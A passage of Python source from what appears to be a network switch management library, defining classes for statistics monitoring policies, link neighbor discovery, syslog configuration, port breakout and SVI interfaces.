raise ValueError('Policy Type must be one of:', policyTypeEnum)
self.name = name
self.policyType = policyType
self.descr = ''
self.collection_policy = {}
self.monitor_target = {}
# assume that it has not been written to Switch. This is cleared if the
# policy is just loaded from Switch or the policy is written to the Switch.
self.modified = True
@classmethod
def get(cls, session):
"""
get() will get all of the monitor policies from the Switch and return
them as a list. It will get both fabric and access (infra) policies
including default policies.
:param session: the instance of Session used for Switch communication
:returns: List of MonitorPolicy objects
"""
result = []
nxObjects = cls._getClass(session, 'monInfraPol')
for data in nxObjects:
name = str(data['monInfraPol']['attributes']['name'])
policyObject = MonitorPolicy('access', name)
policyObject.set_description(data['monInfraPol']['attributes']['descr'])
cls._getPolicy(policyObject, session,
data['monInfraPol']['attributes']['dn'])
result.append(policyObject)
nxObjects = cls._getClass(session, 'monFabricPol')
for data in nxObjects:
name = str(data['monFabricPol']['attributes']['name'])
policyObject = MonitorPolicy('fabric', name)
policyObject.set_description(data['monFabricPol']['attributes']['descr'])
cls._getPolicy(policyObject, session,
data['monFabricPol']['attributes']['dn'])
result.append(policyObject)
return result
@staticmethod
def _getClass(session, nxClass):
"""
Get the class from the Switch
:param session: Session object instance
:param nxClass: string containing classname
:return: JSON dictionary containing class instances
"""
prefix = '/api/node/class/'
suffix = '.json?query-target=self'
class_query_url = prefix + nxClass + suffix
ret = session.get(class_query_url)
data = ret.json()['imdata']
return data
@classmethod
def _getPolicy(cls, policyObject, session, dn):
"""
Get the policy
:param policyObject: policyObject
:param session: Session class instance
:param dn: string containing the distinguished name
:return: None
"""
children = cls._getChildren(session, dn)
for child in children:
if child[0] == 'statsHierColl':
granularity = str(child[1]['attributes']['granularity'])
adminState = str(child[1]['attributes']['adminState'])
retention = str(child[1]['attributes']['histRet'])
collPolicy = CollectionPolicy(policyObject, granularity,
retention, adminState)
collPolicy.set_name(child[1]['attributes']['name'])
collPolicy.set_description(child[1]['attributes']['descr'])
if child[0] in ['monFabricTarget', 'monInfraTarget']:
scope = str(child[1]['attributes']['scope'])
# initially only l1PhysIf is supported as a target
if scope == 'l1PhysIf':
target = MonitorTarget(policyObject, scope)
target.set_name(str(child[1]['attributes']['name']))
target.set_description(str(child[1]['attributes']['descr']))
dn = child[1]['attributes']['dn']
targetChildren = cls._getChildren(session, dn)
for targetChild in targetChildren:
if targetChild[0] == 'statsReportable':
scope = str(targetChild[1]['attributes']['scope'])
scope = MonitorStats.statsDictionary[scope]
statFamily = MonitorStats(target, scope)
child_attr = targetChild[1]['attributes']
statFamily.set_name(str(child_attr['name']))
statFamily.set_description(str(child_attr['name']))
dn = targetChild[1]['attributes']['dn']
statChildren = cls._getChildren(session, dn)
for statChild in statChildren:
if statChild[0] == 'statsColl':
child_stats = statChild[1]['attributes']
granularity = str(child_stats['granularity'])
adminState = str(child_stats['adminState'])
retention = str(child_stats['histRet'])
collPolicy = CollectionPolicy(statFamily,
granularity,
retention,
adminState)
collPolicy.set_name(child_stats['name'])
collPolicy.set_description(child_stats['descr'])
if targetChild[0] == 'statsHierColl':
child_attr = targetChild[1]['attributes']
granularity = str(child_attr['granularity'])
adminState = str(child_attr['adminState'])
retention = str(child_attr['histRet'])
collPolicy = CollectionPolicy(target,
granularity,
retention,
adminState)
collPolicy.set_name(child_attr['name'])
collPolicy.set_description(child_attr['descr'])
@classmethod
def _getChildren(cls, session, dn):
"""
Get the children
:param session: Session instance object
:param dn: string containing the distinguished name
:return: json dictionary containing the children objects
"""
result = []
mo_query_url = '/api/mo/' + dn + '.json?query-target=children'
ret = session.get(mo_query_url)
mo_data = ret.json()['imdata']
for node in mo_data:
for key in node:
result.append((key, node[key]))
return result
def __str__(self):
"""
Return print string.
"""
return self.policyType + ':' + self.name
def flat(self, target='l1PhysIf'):
"""
This method will return a data structure that is a flattened version
of the monitor policy. The flattened version is one that walks through
the heirarchy of the policy and determines the administrative state and
retention policy for each granularity of each statistics family.
This is done for the target specified, i.e. 'l1PhysIf'
For example, if 'foo' is a MonitorPolicy object, then
flatPol = foo.flat('l1PhysIf') will return a dictionary that looks like
the following:
adminState = flatPol['counter_family']['granularity'].adminState
retention = flatPol['counter_family']['granularity'].retention
The dictionary will have all of the counter families for all of the
granularities and the value returned is the administrative state and
retention value that is the final result of resolving the policy
hierarchy.
:param target: Switch target object. This will default to 'l1PhysIf'
:returns: Dictionary of statistic administrative state and retentions
indexed by counter family and granularity.
"""
class Policy(object):
"""
Policy class
"""
def __init__(self):
self.adminState = 'disabled'
self.retention = 'none'
result = {}
# initialize data structure
for statFamily in MonitorStats.statsFamilyEnum:
result[statFamily] = {}
for granularity in CollectionPolicy.granularityEnum:
result[statFamily][granularity] = Policy()
# walk through the policy heirarchy and over-ride each
# policy with the more specific one
for granularity in self.collection_policy:
retention = self.collection_policy[granularity].retention
adminState = self.collection_policy[granularity].adminState
for statFamily in MonitorStats.statsFamilyEnum:
result[statFamily][granularity].adminState = adminState
result[statFamily][granularity].retention = retention
# now go through monitor targets
targetPolicy = self.monitor_target[target]
for granularity in targetPolicy.collection_policy:
retention = targetPolicy.collection_policy[granularity].retention
adminState = targetPolicy.collection_policy[granularity].adminState
for statFamily in MonitorStats.statsFamilyEnum:
if adminState != 'inherited':
result[statFamily][granularity].adminState = adminState
if retention != 'inherited':
result[statFamily][granularity].retention = retention
target_stats = targetPolicy.monitor_stats
for statFamily in target_stats:
collection_pol = target_stats[statFamily].collection_policy
for granularity in collection_pol:
retention = collection_pol[granularity].retention
adminState = collection_pol[granularity].adminState
if adminState != 'inherited':
result[statFamily][granularity].adminState = adminState
if retention != 'inherited':
result[statFamily][granularity].retention = retention
# if the lesser granularity is disabled, then the larger granularity
# is as well
for statFamily in MonitorStats.statsFamilyEnum:
disable_found = False
for granularity in CollectionPolicy.granularityEnum:
if result[statFamily][granularity].adminState == 'disabled':
disable_found = True
if disable_found:
result[statFamily][granularity].adminState = 'disabled'
return result
class MonitorTarget(BaseMonitorClass):
"""
This class is a child of a MonitorPolicy object. It is used to specify a
scope for appling a monitoring policy. An example scope would be the
Interface class, meaning that the monitoring policies specified here will
apply to all Interface clas objects (l1PhysIf in the Switch) that use the
parent MonitoringPolicy as their monitoring policy.
Children of the MonitorTarget will be CollectionPolicy objects that define
the collection policy for the specified target plus optional MonitorStats
objects that allow finer grained control over specific families of
statistics such as ingress packets, ingrPkts.
The CollectionPolicy children are contained in a dictionary called
"collection_policy" that is indexed by the granularity of the
CollectionPolicy, e.g. '5min', '15min', etc.
The MonitorStats children are contained in a dictionary called
"monitor_stats" that is indexed by the name of the statistics family,
e.g. 'ingrBytes', 'ingrPkts', etc.
"""
def __init__(self, parent, target):
"""
The MonitorTarget object is initialized with a parent of type
MonitorPolicy, and a target string. Initially, this toolkit only
supports a target of type 'l1PhysIf'. The 'l1PhyIf' target is a layer
1 physical interface or "port". The MonitorTarget will narrow the
scope of the policy specified by the children of the MonitorTarget to
be only the target class.
:param parent: Parent object that this monitor target is a child.
It must be of type MonitorPolicy
:param target: String specifying the target class for the Monitor
policy.
"""
targetEnum = ['l1PhysIf']
if not type(parent) in [MonitorPolicy]:
raise TypeError(('Parent of MonitorTarget must be one of type'
' MonitorPolicy'))
if target not in targetEnum:
raise ValueError('target must be one of:', targetEnum)
self._parent = parent
self.scope = target
self.descr = ''
self.name = ''
self._parent.add_target(self)
self.collection_policy = {}
self.monitor_stats = {}
# assume that it has not been written to Switch.
# This is cleared if the policy is just loaded from Switch
# or the policy is written to the Switch.
self.modified = True
def __str__(self):
return self.scope
class MonitorStats(BaseMonitorClass):
"""
This class is a child of a MonitorTarget object. It is used to specify
a scope for applying a monitoring policy that is more fine grained than
the MonitorTarget. Specifically, the MonitorStats object specifies a
statistics family such as "ingress packets" or "egress bytes".
"""
statsDictionary = {'eqptEgrBytes': 'egrBytes',
'eqptEgrPkts': 'egrPkts',
'eqptEgrTotal': 'egrTotal',
'eqptEgrDropPkts': 'egrDropPkts',
'eqptIngrBytes': 'ingrBytes',
'eqptIngrPkts': 'ingrPkts',
'eqptIngrTotal': 'ingrTotal',
'eqptIngrDropPkts': 'ingrDropPkts',
'eqptIngrUnkBytes': 'ingrUnkBytes',
'eqptIngrUnkPkts': 'ingrUnkPkts',
'eqptIngrStorm': 'ingrStorm'}
statsFamilyEnum = ['egrBytes', 'egrPkts', 'egrTotal', 'egrDropPkts',
'ingrBytes', 'ingrPkts', 'ingrTotal', 'ingrDropPkts',
'ingrUnkBytes', 'ingrUnkPkts', 'ingrStorm']
def __init__(self, parent, statsFamily):
"""
The MonitorStats object must always be initialized with a parent object
of type MonitorTarget. It sets the scope of its children collection
policies (CollectionPolicy) to a particular statistics family.
The MonitorStats object contains a dictionary of collection policies
called collection_policy. This is a dictionary of children
CollectionPolicy objects indexed by their granularity, e.g. '5min',
'15min', etc.
:param parent: Parent object that this monitor stats object should be
applied to. This must be an object of type MonitorTarget.
:param statsFamily: String specifying the statistics family that the
children collection policies should be applied to.
Possible values are:['egrBytes', 'egrPkts',
'egrTotal', 'egrDropPkts', 'ingrBytes', 'ingrPkts',
'ingrTotal', 'ingrDropPkts', 'ingrUnkBytes',
'ingrUnkPkts', 'ingrStorm']
"""
if not type(parent) in [MonitorTarget]:
raise TypeError(('Parent of MonitorStats must be one of type '
'MonitorTarget'))
if statsFamily not in MonitorStats.statsFamilyEnum:
raise ValueError('statsFamily must be one of:', MonitorStats.statsFamilyEnum)
self._parent = parent
self.scope = statsFamily
self.descr = ''
self.name = ''
self._parent.add_stats(self)
self.collection_policy = {}
# assume that it has not been written to Switch. This is cleared if
# the policy is just loaded from Switch or the policy is written to
# the Switch.
self.modified = True
def __str__(self):
return self.scope
class CollectionPolicy(BaseMonitorClass):
"""
This class is a child of a MonitorPolicy object, MonitorTarget object or
a MonitorStats object. It is where the statistics collection policy is
actually specified. It applies to all of the statistics that are at the
scope level of the parent object,
i.e. all, specific to a target, or specific to a statistics family. What
is specified in the CollectionPolicy is the time granularity of the
collection and how much history to retain. For example, the granularity
might be 5 minutes (5min) or 1 hour (1h). How much history to retain is
similarly specified. For example you might specify that it be kept for
10 days (10d) or 2 years (2year).
If the CollectionPolicy is a child of a MonitorStats object, it can
optionally have children that specify the policy for raising threshold
alarms on the fields in the stats family specified in the MonitorStats
object. This has yet to be implemented.
This object is roughly the same as the statsColl and statsHierColl objects
in the Switch.
"""
# this must be in order from small to large
granularityEnum = ['5min', '15min', '1h', '1d',
'1w', '1mo', '1qtr', '1year']
retentionEnum = ['none', 'inherited', '5min', '15min', '1h', '1d',
'1w', '10d', '1mo', '1qtr', '1year', '2year', '3year']
def __init__(self, parent, granularity, retention, adminState='enabled'):
"""
The CollectionPolicy must always be initialized with a parent object
of type MonitorPolicy, MonitorTarget or MonitorStats. The granularity
must also be specifically specified. The retention period can be
specified, set to "none", or set to "inherited". Note that the "none"
value is a string, not the Python None. When the retention period is
set to "none" there will be no historical stats kept. However,
assuming collection is enabled, stats will be kept for
the current time period.
If the retention period is set to "inherited", the value will be
inherited from the less specific policy directly above this one. The
same applies to the adminState value. It can be 'disabled',
'enabled', or 'inherited'. If 'disabled', the current scope of
counters are not gathered. If enabled, they are gathered. If
'inherited', it will be according to the next higher scope.
Having the 'inherited' option on the retention and administrative
status allows these items independently controlled at the current
stats granularity. For example, you can specify that ingress unknown
packets are gathered every 15 minutes by setting adding a collection
policy that specifies a 15 minutes granularity and an adminState of
'enabled' under a MonitorStats object that sets the scope to be
ingress unknown packets. This might override a higher level policy
that disabled collection at a 15 minute interval. However, you can
set the retention in that same object to be "inherited" so that this
specific policy does not change the retention behavior from that of
the higher, less specific, policy.
When the CollectionPolicy is a child at the top level, i.e. of the
MonitorPolicy, the 'inherited' option is not allowed because there
is no higher level policy to inherit from. If this were to happen,
'inherited' will be treated as 'enabled'.
:param parent: Parent object that this collection policy should be
applied to. This must be an object of type MonitorStats,
MonitorTarget, or MonitorPolicy.
:param granularity: String specifying the time collection interval or
granularity of this policy. Possible values are:
['5min', '15min', '1h', '1d', '1w', '1mo', '1qtr',
'1year'].
:param retention: String specifying how much history to retain the
collected statistics for. The retention will be for
time units of the granularity specified. Possible
values are ['none', 'inherited', '5min', '15min',
'1h', '1d', '1w', '10d', '1mo', '1qtr', '1year',
'2year', '3year'].
:param adminState: Administrative status. String to specify whether
stats should be collected at the specified
granularity. Possible values are ['enabled',
'disabled', 'inherited']. The default if not
specified is 'enabled'.
"""
adminStateEnum = ['enabled', 'disabled', 'inherited']
if type(parent) not in [MonitorStats, MonitorTarget, MonitorPolicy]:
raise TypeError(('Parent of collection policy must be one of '
'MonitorStats, MonitorTarget, or MonitorPolicy'))
if granularity not in CollectionPolicy.granularityEnum:
raise ValueError('granularity must be one of:',
CollectionPolicy.granularityEnum)
if retention not in CollectionPolicy.retentionEnum:
raise ValueError('retention must be one of:',
CollectionPolicy.retentionEnum)
if adminState not in adminStateEnum:
raise ValueError('adminState must be one of:',
CollectionPolicy.adminStateEnum)
self._parent = parent
self.granularity = granularity
self.retention = retention
self.adminState = adminState
self._children = []
self._parent.add_collection_policy(self)
# assume that it has not been written to Switch. This is cleared if
# the policy is just loaded from Switch or the policy is written to
# the Switch.
self.modified = True
def __str__(self):
return self.granularity
def setAdminState(self, adminState):
"""
Sets the administrative status.
:param adminState: Administrative status. String to specify whether
stats should be collected at the specified
granularity. Possible values are ['enabled',
'disabled', 'inherited']. The default if not
specified is 'enabled'.
"""
if self.adminState != adminState:
self.modified = True
self.adminState = adminState
def setRetention(self, retention):
"""
Sets the retention period.
:param retention: String specifying how much history to retain the
collected statistics for. The retention will be for
time units of the granularity specified. Possible
values are ['none', 'inherited', '5min', '15min',
'1h', '1d', '1w', '10d', '1mo', '1qtr', '1year',
'2year', '3year'].
"""
if self.retention != retention:
self.modified = True
self.retention = retention
class LogicalModel(BaseNXObject):
"""
This is the root class for the logical part of the network.
It's corrolary is the PhysicalModel class.
It is a container that can hold all of logical model instances such
as Tenants.
From this class, you can populate all of the children classes.
"""
def __init__(self, session=None, parent=None):
"""
Initialization method that sets up the Fabric.
:return:
"""
if session:
assert isinstance(session, Session)
super(LogicalModel, self).__init__(name='', parent=parent)
self.session = session
@classmethod
def get(cls, session=None, parent=None):
"""
Method to get all of the PhysicalModels. It will get one and
return it in a list.
:param session:
:param parent:
:return: list of PhysicalModel
"""
logical_model = LogicalModel(session=session, parent=parent)
return [logical_model]
def populate_children(self, deep=False, include_concrete=False):
"""
This method will populate the children of the fabric. If deep is set
to True, it will populate the entire object tree, both physical and logical.
If include_concrete is set to True, it will also include the concrete models
on the network switches.
:param deep:
:param include_concrete:
:return: list of immediate children objects
"""
if deep:
for child in self._children:
child.populate_children(deep, include_concrete)
return self._children
class LinkNeighbors(BaseNXObject):
"""
This class represents cdp or lldp neighbors information
"""
def __init__(self, disc_proto='cdp', session=None, attributes=None):
"""
Initialization of cdp and lldp information
:param disc_proto: string contains name of discovery
protocol (cdp, lldp)
:param session: the instance of Session used for switch communication
:param attributes: A dictionary contains neighbors information
:return:
"""
super(LinkNeighbors, self).__init__(name="")
self._session = session
if attributes is None:
self.attributes = {}
else:
self.attributes = copy.deepcopy(attributes)
self.disc_proto = disc_proto
@classmethod
def _is_feature_enabled(cls, session, f_name=None):
"""
This method will check if the f_name feature is enabled in the
switch. If enabled return True or else return False
:param session: the instance of Session used for switch communication
:param f_name: String represents a feature name
:return Boolean value
"""
feature_url = '/api/mo/sys/fm.json?rsp-subtree=full'
resp = session.get(feature_url)
for fm in resp.json()['imdata']:
if fm.get('fmEntity'):
for feature in fm['fmEntity']['children']:
if feature.get('fm'+f_name.title()):
return True
return False
@classmethod
def get(cls, session, disc_proto='auto', module=None, port=None):
"""
Gets cdp or lldp neighbors details depending on disc_proto parameter
:param session: the instance of Session used for switch communication
:param disc_proto: Discovery protocol used for getting neighbors
(default: cdp)
:param module: Module id string. This specifies the module or
slot of the port. (optional)
:param port: Port number. This is the port to read. (optional)
:returns: list of LinkNeighbors object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if port:
if not isinstance(port, str):
raise TypeError('When specifying a specific port, the port'
' must be a identified by a string')
if not isinstance(module, str):
raise TypeError(('When specifying a specific port, the module'
' must be identified by a string'))
if disc_proto.lower() in ['auto', 'lldp']:
# If discovery protocol is auto or lldp, then check if lldp is
# enabled and use it. If lldp is not enabled use cdp
if LinkNeighbors._is_feature_enabled(session, 'lldp'):
disc_proto = 'lldp'
else:
disc_proto = 'cdp'
else:
# If some random values is passed in disc_proto, then cdp is used
disc_proto = 'cdp'
iface_name = ''
if module and port:
iface_name = '/if-[eth{0}/{1}]'.format(module, port)
query_url = ('/api/mo/sys/%s/inst%s.json?rsp-subtree=full'
% (disc_proto, iface_name))
neighbors_resp = session.get(query_url)
neighbors = neighbors_resp.json()['imdata']
if module and port:
children = neighbors
elif len(neighbors) > 0:
children = neighbors[0][disc_proto+'Inst']['children']
else:
children = []
resp = []
adj_epg = disc_proto+'AdjEp'
proto_if = disc_proto+'If'
for ch in children:
for sub_ch in ch[proto_if]['children']:
if sub_ch.get(adj_epg):
attributes = {}
attributes['devId'] = str(sub_ch[adj_epg]['attributes']\
['devId'])
attributes['portId'] = str(sub_ch[adj_epg]['attributes']\
['portId'])
attributes['sysName'] = str(sub_ch[adj_epg]['attributes']\
['sysName'])
attributes['ver'] = str(sub_ch[adj_epg]['attributes']\
['ver'])
attributes['cap'] = str(sub_ch[adj_epg]['attributes']\
['cap'])
# Currently hold time is now supported
attributes['Hldtme'] = '-'
if disc_proto == 'cdp':
attributes['platId'] = \
str(sub_ch[adj_epg]['attributes']['platId'])
else:
attributes['platId'] = "-"
# attributes['id'] holds local interface
attributes['id'] = str(ch[proto_if]['attributes']['id'])
attributes['operSt'] = str(ch[proto_if]['attributes']\
['operSt'])
resp.append(LinkNeighbors(disc_proto=disc_proto,
session=session,
attributes=attributes))
return resp
class HardwareInternal(object):
"""
This class defines hardware internal details
"""
def __init__(self, parent):
self._parent = parent
def buff_pkt_details(self, session):
"""
:param session: Session object
:return Json output of buffer packet details
"""
command = 'show hardware internal buffer info pkt-stats detail'
return session.post_nxapi(command).text
def get(self, session=None):
"""
:param session: Session object
:return
"""
if not session:
session = self._parent._session
resp = self.buff_pkt_details(session)
buffer_info = json.loads(resp)['ins_api']['outputs']['output']\
['body']['TABLE_module']['ROW_module']
module_number = buffer_info['module_number']
if module_number:
hardware_int = HardwareInternal(session)
hardware_int.buffer = {}
hardware_int.buffer['total_instant'] = []
hardware_int.buffer['rem_instant'] = []
hardware_int.buffer['switch_cell'] = []
hardware_int.buffer['max_cell'] = []
pars = buffer_info['TABLE_instance']['ROW_instance']
for index in range (1,5):
total_ins = "total_instant_usage_" + str(index)
rem_ins = "rem_instant_usage_" + str(index)
max_cel = "max_cell_usage_" + str(index)
switch_cel = "switch_cell_count_" + str(index)
hardware_int.buffer['total_instant'].append(pars[total_ins])
hardware_int.buffer['rem_instant'].append(pars[rem_ins])
hardware_int.buffer['max_cell'].append(pars[max_cel])
hardware_int.buffer['switch_cell'].append(pars[switch_cel])
return hardware_int
class Hardware(BaseNXObject):
"""
This class defines Hardware.
"""
def __init__(self, session=None):
self.internal = HardwareInternal(self)
self._session = session
@classmethod
def get(cls, session, type='nxapi'):
"""
:param session: Session object
:param type: String defines type of REST call (nxapi default)
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if type == 'nxapi':
return Hardware(session)
class LogTimeStamp(object):
"""
This class defines timestamp logging
"""
def __init__(self, session=None, parent=None, format='seconds'):
self._session= session
self._parent = parent
self.format= format
self.object = 'syslogTimeStamp'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogTimeStamp object
"""
query_url = '/api/mo/sys/syslog/timestamp.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
format = ret[self.object]['attributes']['format']
return LogTimeStamp(format=format)
def _get_attributes(self):
att = {}
att['format'] = self.format
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogMonitor(object):
"""
This class defines Monitor logging
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', severity='notifications'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.severity = severity
# monitor logging object name
self.object = 'syslogTermMonitor'
def get(self, session=None):
if not session:
session = self._session
query_url = '/api/mo/sys/syslog/monitor.json'
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
severity = ret[self.object]['attributes']['severity']
return LogMonitor(admin_st=admin_st, severity=severity)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['severity'] = self.severity
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogConsole(object):
"""
This class defines logging console
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', severity='critical'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.severity = severity
# Base class object name for console logging
self.object = 'syslogConsole'
def get(self, session=None):
query_url = '/api/mo/sys/syslog/console.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
severity = ret[self.object]['attributes']['severity']
return LogConsole(admin_st=admin_st, severity=severity)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['severity'] = self.severity
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogServer(object):
"""
This class defines server logging
"""
def __init__(self, session=None, parent=None,
host=None, severity='notifications', vrf_name='',
fwd_facility='local7'):
self._session= session
self._parent = parent
self.host = host
self.severity = severity
self.vrf_name = vrf_name
self.fwd_facility = fwd_facility
self.object = 'syslogRemoteDest'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogServer object
"""
query_url = '/api/node/class/syslogSyslog.json?rsp-subtree=full'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret['syslogSyslog']['children']
for child in children:
if child.get(self.object):
host = child[self.object]['attributes']['host']
severity = child[self.object]['attributes']['severity']
vrf_name = child[self.object]['attributes']['vrfName']
fwd_facility = child[self.object]['attributes']\
['forwardingFacility']
return LogServer(host=host, severity=severity,
vrf_name=vrf_name,
fwd_facility=fwd_facility)
def _get_attributes(self):
att = {}
att['host'] = self.host
att['severity'] = self.severity
att['vrfName'] = self.vrf_name
att['forwardingFacility'] = self.fwd_facility
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogSourceInterface(object):
"""
This class defines source interface logging
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', if_name='unspecified'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.if_name = if_name
self.object = 'syslogSourceInterface'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogSourceInterface object
"""
query_url = '/api/mo/sys/syslog/source.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
if_name = ret[self.object]['attributes']['ifName']
return LogSourceInterface(admin_st=admin_st, if_name=if_name)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['ifName'] = self.if_name
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogLevel(object):
"""
This class defines log level
"""
def __init__(self, session=None, parent=None,
facility=None, severity='errors'):
self._session= session
self._parent = parent
self.facility = facility
self.severity = severity
self.object = 'syslogLevel'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogLevel object
"""
query_url = '/api/node/class/syslogSyslog.json?rsp-subtree=full'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret['syslogSyslog']['children']
for child in children:
if child.get(self.object):
facility = child[self.object]['attributes']['facility']
severity = child[self.object]['attributes']['severity']
return LogLevel(facility=facility, severity=severity)
def _get_attributes(self):
att = {}
att['facility'] = self.facility
att['severity'] = self.severity
return att
def get_json(self):
return {self.object : { "attributes" : self._get_attributes()}}
class Logging(BaseNXObject):
"""
This is the parent class for all the logging classes
"""
def __init__(self, session=None, parent=None):
super(Logging, self).__init__(name="logging")
self._session = session
self._parent = parent
self._children = []
# Base syslog object
self.object = 'syslogSyslog'
self.timestamp = LogTimeStamp(session=session, parent=self)
self.level = LogLevel(session=session, parent=self)
self.server = LogServer(session=session, parent=self)
self.monitor = LogMonitor(session=session, parent=self)
self.src_iface = LogSourceInterface(session=session, parent=self)
self.console = LogConsole(session=session, parent=self)
def add_log(self, log_obj=None):
self._children.append(log_obj)
def get_json(self):
return super(Logging, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/syslog.' + fmt
@classmethod
def get(cls, session=None):
"""
:param session: Session object used to communicate with Switch
:return Logging object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return Logging(session=session)
class BreakoutPort(object):
"""
This class defines breakout ports
"""
def __init__(self, id=None, map=None, session=None, parent=None):
self.id = id
self.map = map
self.object = 'imFpP'
self._session = session
self._parent = parent
def get_json(self):
return {self.object : {'attributes' : self._get_attributes()}}
def _get_attributes(self):
att = {}
if not self.id:
raise AttributeError('Port id required')
att['id'] = self.id
att['breakoutMap'] = self.map
return att
def get(self, port=None, session=None):
if not session:
session = self._session
query_url = ('/api/mo/sys/breakout/module-%s.json?query-target'
'=children' % (self._parent.module_num))
ret = []
ports = session.get(query_url).json()['imdata']
for port in ports:
id = str(port['imFpP']['attributes']['id'])
map = str(port['imFpP']['attributes']['breakoutMap'])
ret.append(BreakoutPort(id, map, session=session))
return ret
class BreakoutModule(BaseNXObject):
"""
This class defines breakout modules
"""
def __init__(self, module_num=None, session=None, parent=None):
if not module_num:
raise TypeError('Module id expected')
super(BreakoutModule, self).__init__(name=module_num)
self._session = session
self._parent = parent
self.module_num = module_num
self.object = 'imMod'
self.ports = BreakoutPort(session=session, parent=self)
def add_port_map(self, id=None, map=None):
"""
:param id: String reprenenting id (example 1, 45 etc.)
:param map: String map (Example: 10g-4x)
"""
if not isinstance(map, str):
raise TypeError('str instance is expected for map')
try:
int(id)
except ValueError:
raise ValueError('Invalid port Id')
self._children.append(BreakoutPort(id, map))
def _get_attributes(self):
att = {}
att['id'] = self.module_num
return att
def get_json(self):
return super(BreakoutModule,
self).get_json(self.object,
attributes=self._get_attributes())
def get(self, module_num=None, session=None):
"""
Get break module info
:param module_num String representing number
:param Session object used for communicating with switch
:return List of BreakoutModule objects
"""
if not session:
session = self._session
if module_num:
query_url = '/api/mo/sys/breakout/module-%s.json' % (module_num)
else:
query_url = '/api/mo/sys/breakout.json?query-target=children'
modules = session.get(query_url).json()['imdata']
ret = []
for module in modules:
if module.get('imMod'):
module_num = str(module['imMod']['attributes']['id'])
ret.append(BreakoutModule(module_num, session=session))
return ret
class InterfaceBreakout(BaseNXObject):
"""
This class defines Interface Breakout
"""
def __init__(self, session=None):
super(InterfaceBreakout, self).__init__(name='')
self._session = session
self.object = 'imBreakout'
# id (1) passed here does not make any impact
self.modules = BreakoutModule('1', session=session, parent=self)
def add_module(self, module):
if not isinstance(module, BreakoutModule):
raise TypeError('BreakoutModule instance expected')
self._children.append(module)
def get_json(self):
return super(InterfaceBreakout, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/breakout.' + fmt
def get_delete_url(self, module=None, port=None):
return '/api/mo/sys/breakout/module-%s/fport-%s.json' % (module, port)
@classmethod
def get(cls, session=None, module=None, port=None):
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return InterfaceBreakout(session)
class SVI(BaseNXObject):
"""
This class defines SVI
"""
def __init__(self, vlan=None, admin_st=None, descr=None):
if not vlan:
raise TypeError('Proper vlan name expected')
try:
# A dummy line which raises error if vlan is otherthan
# vlan<ID> format
int(vlan.replace('vlan', ''))
except ValueError:
raise AttributeError('Proper vlan name expected')
super(SVI, self).__init__(name=vlan)
self.id = vlan #vlan id
self.if_name = vlan
self.descr = descr
self.admin_st = admin_st
self.mtu = None
self.bw = None
self.object = 'sviIf'
def set_bw(self, bw=None):
self.bw = bw
def set_mtu(self, mtu=None):
self.mtu = mtu
def get_mtu(self):
return self.mtu
def get_bw(self):
return self.bw
def get_url(self, fmt='json'):
return '/api/mo/sys/intf/svi-[%s].%s' % (self.id, fmt)
def get_delete_url(self, vlan=None):
return '/api/mo/sys/intf/svi-[%s].json' % (vlan)
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
if self.mtu:
att['mtu'] = self.mtu
if self.bw:
att['bw'] = self.bw
return att
def get_json(self):
return super(SVI, self).get_json(self.object,
attributes=self._get_attributes())
@classmethod
def get(cls, session=None, vlan=None):
"""
Get SVI details
:param session: Session instance to commnunicate with switch
:param vlan: String represents svi id i.e. valn10
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if vlan:
query_url = '/api/mo/sys/intf/svi-[%s].json' % (vlan)
else:
query_url = '/api/node/class/sviIf.json'
svis = session.get(query_url).json()['imdata']
resp = []
for svi in svis:
admin_st = str(svi['sviIf']['attributes']['adminSt'])
id = str(svi['sviIf']['attributes']['id'])
mtu = str(svi['sviIf']['attributes']['mtu'])
desc = str(svi['sviIf']['attributes']['descr'])
bw = str(svi['sviIf']['attributes']['bw'])
svi_obj = SVI(id, admin_st, desc)
svi_obj.set_mtu(mtu)
svi_obj.set_bw(bw)
resp.append(svi_obj)
return resp
class ConfigInterfaces(BaseNXObject):
"""This class is used to configure multiple interfaces/svi/port channel
at a time.
"""
def __init__(self, session=None):
super(ConfigInterfaces, self).__init__(name='')
self.object = 'interfaceEntity'
def add_interface(self, interface=None):
"""Form the list of interfaces to be configured"""
if not isinstance(interface, Interface):
raise TypeError('Interface instance is expected')
self._children.append(interface)
def add_svis(self, svi=None):
"""Form list of SVIs"""
if not isinstance(svi, SVI):
